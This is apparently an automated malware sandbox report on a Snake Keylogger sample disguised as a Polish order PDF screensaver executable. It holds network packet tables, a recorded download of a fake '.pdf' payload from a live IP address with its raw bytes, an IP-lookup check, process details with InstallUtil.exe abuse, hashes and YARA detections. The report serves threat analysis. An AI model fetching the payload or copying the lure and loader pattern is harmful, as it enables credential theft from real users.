Apr 7, 2025 08:37:15.568020105 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.568034887 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.568054914 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.568062067 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.568097115 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.568120956 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.613780022 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.613982916 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.663114071 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.663130045 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.663161993 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.663223982 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.663264990 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.907226086 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.907289982 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.907382011 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.907404900 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.907432079 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.907448053 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.907448053 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.907474041 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.907476902 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.907504082 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.907531023 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.908158064 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.908178091 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.908200979 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.908215046 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.908237934 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.908243895 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.908265114 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.908288002 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.908318996 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.953583002 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.953607082 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.953649044 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.953686953 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.004569054 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.004590988 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.004709959 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.246757030 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.246854067 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.246906042 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.247473955 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.247525930 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.247849941 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.247864008 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.247886896 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.247910976 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.290838957 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.293000937 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.293015003 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.293076992 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.344326019 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.348401070 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.348570108 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.586467028 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.586487055 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.586565971 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.586873055 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.586885929 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.586930990 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.632800102 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.632883072 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.632894993 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.633024931 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.633102894 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.633166075 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.688574076 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.734570980 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.926803112 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.926881075 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.926938057 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.927164078 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.927357912 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.927499056 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.972657919 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.972671032 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.972695112 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.972719908 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:16.972779989 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:16.972831964 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:17.074841022 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:17.074862957 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:17.074909925 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:17.268888950 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:17.269053936 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:17.269076109 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:17.269120932 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:17.269155025 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:17.277013063 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:17.616529942 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:33.871583939 CEST	49694	80	192.168.2.5	158.101.44.242
Apr 7, 2025 08:37:34.025490999 CEST	80	49694	158.101.44.242	192.168.2.5
Apr 7, 2025 08:37:34.025590897 CEST	49694	80	192.168.2.5	158.101.44.242
Apr 7, 2025 08:37:34.026124954 CEST	49694	80	192.168.2.5	158.101.44.242
Apr 7, 2025 08:37:34.182437897 CEST	80	49694	158.101.44.242	192.168.2.5
Apr 7, 2025 08:37:35.180196047 CEST	80	49694	158.101.44.242	192.168.2.5
Apr 7, 2025 08:37:35.228372097 CEST	49694	80	192.168.2.5	158.101.44.242
Apr 7, 2025 08:38:40.180421114 CEST	80	49694	158.101.44.242	192.168.2.5
Apr 7, 2025 08:38:40.180610895 CEST	49694	80	192.168.2.5	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 7, 2025 08:37:33.726330996 CEST	61674	53	192.168.2.5	1.1.1.1
Apr 7, 2025 08:37:33.825289011 CEST	53	61674	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 7, 2025 08:37:33.726330996 CEST	192.168.2.5	1.1.1.1	0x9968	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 7, 2025 08:37:33.825289011 CEST	1.1.1.1	192.168.2.5	0x9968	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 7, 2025 08:37:33.825289011 CEST	1.1.1.1	192.168.2.5	0x9968	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Apr 7, 2025 08:37:33.825289011 CEST	1.1.1.1	192.168.2.5	0x9968	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Apr 7, 2025 08:37:33.825289011 CEST	1.1.1.1	192.168.2.5	0x9968	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Apr 7, 2025 08:37:33.825289011 CEST	1.1.1.1	192.168.2.5	0x9968	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Apr 7, 2025 08:37:33.825289011 CEST	1.1.1.1	192.168.2.5	0x9968	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

161.248.239.119

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49691	161.248.239.119	80	2360	C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe

Timestamp	Bytes transferred	Direction	Data
Apr 7, 2025 08:37:03.625338078 CEST	244	OUT	GET /ADOLF/Nnjlcgpkdo.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; U; Android 11; en-US; SM-A107F) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 UCBrowser/13.4.0.1306 Mobile Safari/537.36 Host: 161.248.239.119 Connection: Keep-Alive
Apr 7, 2025 08:37:03.966331959 CEST	1254	IN	HTTP/1.1 200 OK Date: Mon, 07 Apr 2025 06:37:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Mon, 07 Apr 2025 02:28:51 GMT ETag: "d5eec-63226ff2e797c" Accept-Ranges: bytes Content-Length: 876268 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 00 3a 10 00 1f 8b 08 00 00 00 00 00 04 00 ec bd 77 60 16 c5 f3 3f 7e e9 bd 5c 9e f0 24 24 90 e7 e8 0f 51 11 15 e4 12 a5 a9 a0 62 05 41 9f 20 4a 47 41 25 0a 8a 1d b1 37 40 11 bb 31 2a f6 de b0 0b 8a 22 76 05 04 2b 08 76 41 05 01 95 22 84 ef eb 35 7b b7 77 97 3c 81 d8 3e bf df 1f 6f f4 b9 ec ed ce ce ce ce ce ee ce ce ce ee 1d 36 f8 5a 23 c9 30 8c 64 fc b6 6f 37 8c e7 0d f5 af 97 b1 f3 7f 53 f0 cb 8d bc 98 6b cc ce 78 bf d5 f3 09 87 be df 6a e0 89 63 27 5a a7 4e a8 3e 61 c2 f0 53 ac 91 c3 c7 8f af 3e dd 1a 31 da 9a 70 c6 78 6b ec 78 eb 80 23 8e b2 4e a9 1e 35 ba 53 4e 4e 66 5b 07 c7 91 7d 0c e3 d0 84 24 e3 38 7b c3 09 2e de 95 46 6e ab ac 84 ce 86 b1 67 be 61 a4 aa b8 f1 fd 11 b6 10 18 96 af a8 63 38 51 d1 6d 18 de 5f e3 ce 7c 89 e7 bf 24 a3 d7 a5 86 91 2f ff 7b 7f 0d 23 cf 57 07 0b 78 0f 31 14 de 5d 93 e2 55 32 df c8 6e 02 2f 1a fc 03 7d e9 be d7 74 bc 1f e4 7b ef 74 fa e8 b3 4e c7 df d3 f7 70 ea b5 a7 47 b7 0f c5 b0 4e 13 26 4e 18 89 b0 d0 c6 ba b3 a2 5d f2 03 70 bd 0c e3 d5 4e 13 46 9f 5c 0d c0 6c [TRUNCATED] Data Ascii: :w`?~\$$QbA JGA%7@1"v+vA"5{w<>o6Z#0do7Skxjc'ZN>aS>1pxkx#N5SNNf[}$8{.Fngac8Qm_\|$/{#Wx1]U2n/}t{tNpGN&N]pNF\lfe7>GW0-H1'M4i)e}P$c"dZ$.0a_G&aNgmQF\|c%~M14K`i`y0@4'@O#"Gt71!aa%kGWX;wIc ^Qfra]Fr7-Q)>&4#91BCuuzw n7QDi}mVO^%h5'uN%MJ>"TP)[]+zGQy4@T+Ylsr~7E=F[j~{J[8\|;N.8_Wr'\|e`.l\yKd 98\|LKk^IGkBZJMh55{{;g9+?gD8!Y/i(<
Apr 7, 2025 08:37:03.966368914 CEST	1254	IN	Data Raw: 1c 15 f7 c0 63 01 fe 6e c4 df be 4e 26 c6 ef 83 05 6e 36 06 c9 03 b3 3c 1d 8f f1 67 00 79 3b 8c 6e b7 a6 04 75 bf fe f8 cd c2 c0 ba 21 db af 5f ee 4c f7 fb 47 3a cb 18 4f c7 de b1 ce 72 93 37 2e 1b 8d 8d cb 0d 69 6d 38 a7 34 fe 4e f8 94 9d cc 41 Data Ascii: cnN&n6<gy;nu!_LG:Or7.im84NAuTukxxJMkcu}Ft^{kTb_s\FkW9oU)^zgjNF8r
Apr 7, 2025 08:37:03.966392040 CEST	1254	IN	Data Raw: 5e db 84 b1 db f7 1e d7 ef d6 bf 26 5d 05 1a 2a 13 1b f3 57 f5 60 3b e3 f7 22 60 57 27 04 db 37 c8 83 7f ba ce 6b 9a ad 71 4e 13 c6 d2 c6 ec 11 63 90 e3 14 fc 3e 4a 0c ca ef 73 20 74 1d fe 3e e0 b3 3b b8 3c 8a 82 f8 b3 53 fe b9 8d ac 89 76 cb 17 Data Ascii: ^&]*W`;"`W'7kqNc>Js t>;<Svw,m2_Jjx:@)W^dO^0zd.it,<B=_;)0'{m^ud)5+GOrlPkbpt=/h&
Apr 7, 2025 08:37:03.966453075 CEST	1254	IN	Data Raw: 47 19 8b 81 2b 44 5b da 38 24 da c7 d0 92 9c a2 5b 71 2c 65 20 45 5a b1 1d 5b 71 4b 5d b0 bd b3 35 e4 e9 84 fc a2 4e 0f 26 0b 11 b4 b9 26 f6 61 e3 9a a3 f2 b9 3a 2d 51 8f b0 ed f1 77 0f 80 08 2a fb 56 c4 b0 b7 58 5f cd f9 69 c3 68 eb e3 f2 f7 fe Data Ascii: G+D[8$[q,e EZ[qK]5N&&a:-QwVX_ihYfw-9GZ/NIo&YEDp3\l*Faa%Pd6Oho`gUVKOxVVW=2rUmZ&_9;c$Cp$7o#
Apr 7, 2025 08:37:04.306113005 CEST	1254	IN	Data Raw: 37 3a 72 78 d1 f8 8b be 18 63 1d 34 e3 fc b6 55 c3 85 8c 90 b4 3f 92 ed 49 14 b2 52 69 ff 8d 0e 47 3f 86 d4 8e 1e 33 3a 26 45 4d 84 d0 bf 8c 62 3e c2 5f 8b 56 29 7b d9 1f 4a 97 6b a0 b7 73 96 df d1 7a 9d bd 9d b6 40 fe 9d 65 28 5d 8a ae 88 d4 b7 Data Ascii: 7:rxc4U?IRiG?3:&EMb>_V){Jksz@e(]xCm{Q2?6fJkdm94S5JYxz1g'&(c~6LVv)~>o\v}^_t>?nLnB
Apr 7, 2025 08:37:04.306140900 CEST	1254	IN	Data Raw: 95 90 cd ba 67 68 58 39 e1 52 e3 ad f8 66 6c 76 bb 6b b2 74 d7 b2 f3 8f 26 72 21 ed 0c ae d6 16 52 0b 1f 1e 9c 7f 87 48 7e 2e 3e ed fe 9b 9d b6 29 2d 53 12 6e f7 74 63 22 2d ac c4 04 96 7e a2 e1 d7 ce 9c f5 a0 74 66 ae 07 7d d3 bc 98 7d b6 63 b5 Data Ascii: ghX9Rflvkt&r!RH~.>)-Sntc"-~tf}}cdG"=K&eHF,<?e%&TRs~'_I,9CK ^I$aafUUro[XXrK{ar%YI6-:Z:}\[]ev^$R+QrFOO
Apr 7, 2025 08:37:04.306180000 CEST	1254	IN	Data Raw: 13 40 da 28 ed 4c 8d b4 a5 95 30 8c 48 47 31 7a c3 9a ed db cb 42 86 45 9f 7e fb 7b bc 94 9b 69 56 84 2b d5 27 b7 39 9b 08 0a 1f 8f 95 56 bc b1 86 f8 78 6f 87 fd e2 1a 07 5f 18 fd ec 3c 97 f4 3b dd d8 e6 18 8b af 94 f9 7f 8d 27 11 87 89 53 03 63 Data Ascii: @(L0HG1zBE~{iV+'9Vxo_<;'Sc[\xN%U]E!(VNd/u7]z"a+!>60Vlh/xfV9^i>th,AHod~$V9Jw6f$-_ 2duN4@
Apr 7, 2025 08:37:04.306200981 CEST	1254	IN	Data Raw: 10 b5 04 a2 48 00 11 58 59 18 b1 ea d5 ae 24 d2 2a 35 5a ec 21 2a 03 57 5a 3b 31 9a 4d f9 91 36 4e 94 83 09 b5 8d b4 75 a2 5c 86 97 44 da 05 30 95 20 63 fb 00 a6 96 40 d4 21 88 28 13 88 a2 41 44 91 9c 92 48 c7 00 a6 30 30 95 07 30 35 07 a6 5d 02 Data Ascii: HXY$5Z!WZ;1M6Nu\D0 c@!(ADH0005]Zv "sUEdhsSKP2/Ar"]--"]AL- "dT0@>DP"1tbL3)z3/XfA,j`<1s#C
Apr 7, 2025 08:37:04.306237936 CEST	1254	IN	Data Raw: 5f e9 9d 00 9f 4c c7 72 59 ff aa a4 f1 de 7a 98 c7 cd d1 2b 2a bb c8 a2 48 43 b0 be 0e 44 b2 54 21 41 59 23 b8 03 42 31 14 2b 52 2b e9 50 d1 0b 75 b9 97 32 eb 12 0f f9 db ec 44 74 ad 92 95 bd 24 57 3c e3 99 8c 1e 42 70 f9 08 5d 52 23 25 b7 34 fa Data Ascii: _LrYz+HCDT!AY#B1+R+Pu2Dt$W<Bp]R#%4$%iHU]uFPFWbR^HSQy.yXR->P!N dUz,Tt(2J3y<eRn?tWJ>Q)O\+;;+-Pm?Q3sMDw9KaIF
Apr 7, 2025 08:37:04.306256056 CEST	1254	IN	Data Raw: 43 27 27 6d 8f 54 e8 16 33 dc 37 80 2e 49 a3 a3 b3 89 4c d6 b1 38 89 cb 0c e7 ac 6a 9c 44 79 a3 e0 59 bf ba 65 55 f9 22 d7 7b 91 e2 cf 27 dd df 43 93 dc 10 0d 5d d8 e4 f8 86 c3 16 ca b0 f4 1c 99 4e ab 7c 91 74 9d 93 59 cc 0f f9 ba a6 b5 46 38 2e Data Ascii: C''mT37.IL8jDyYeU"{'C]N\|tYF8.bSu-[K\6\|W:&!CId+2sb141e/Z5E?!#0rPXoL@4_,NT]DDz/{vD6@d]K/7\|xS}aWW
Apr 7, 2025 08:37:04.306307077 CEST	1254	IN	Data Raw: 8f f4 0c 94 91 1d 28 23 5b f7 c6 03 14 3a 5b f7 cc 1d e5 e8 e7 4a 03 72 88 42 67 04 58 9e 63 f8 c7 1f 59 1e bd ed ca 27 72 f0 78 96 58 b0 3d aa 72 34 5b 6e 61 62 65 80 80 9c 00 01 b9 f5 d0 79 91 ec 61 ee 38 74 b2 4f f2 1c aa 72 03 54 c9 f2 c8 af Data Ascii: (#[:[JrBgXcY'rxX=r4[nabeya8tOrT{+#O3RUy~Bi,4hGOvf;3\4qlg,&Sxt<3Vy*cblv<xG?Geenb@-vZ^%&]JaD`ya\YjloaD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49694	158.101.44.242	80	5604	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Apr 7, 2025 08:37:34.026124954 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 7, 2025 08:37:35.180196047 CEST	730	IN	HTTP/1.1 502 Bad Gateway Date: Mon, 07 Apr 2025 06:37:35 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 6de525e9ac24c4aa51ff9a048b019a52 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Statistics

Click to jump to process

Memory Usage

• zam#U00f3wienie 12832025_pdf .scr.exe
• InstallUtil.exe
• WerFault.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry
• Network

Click to dive into process behavior distribution

Behavior

• zam#U00f3wienie 12832025_pdf .scr.exe
• InstallUtil.exe
• WerFault.exe

Click to jump to process

Target ID:	0
Start time:	02:37:01
Start date:	07/04/2025
Path:	C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe"
Imagebase:	0x2c688a90000
File size:	26'112 bytes
MD5 hash:	83792964E40A22BCFC1E2F1306B0BF45
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1619061673.000002C6A3280000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1607652560.000002C68A7C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:37:32
Start date:	07/04/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
Imagebase:	0x264284a0000
File size:	41'552 bytes
MD5 hash:	909A1D386235DD5F6BA61B91BA34119D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.2548659789.000002642A231000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:37:34
Start date:	07/04/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5604 -s 1424
Imagebase:	0x7ff719bb0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FF7C8147EF2 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

Z, xrefs: 00007FF7C8147F73
o, xrefs: 00007FF7C8147F43

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID: Z$o
API String ID: 0-2995777307
Opcode ID: c9ee9f0e1da7da110703fd3ea49c3a76360bfa90e2b1f9e9438ff8b64f60a793
Instruction ID: 60c3dff83f6c6ad48db2ba3cf7481ec38215745d79d5251ab8ac326cfef65cf6
Opcode Fuzzy Hash: c9ee9f0e1da7da110703fd3ea49c3a76360bfa90e2b1f9e9438ff8b64f60a793
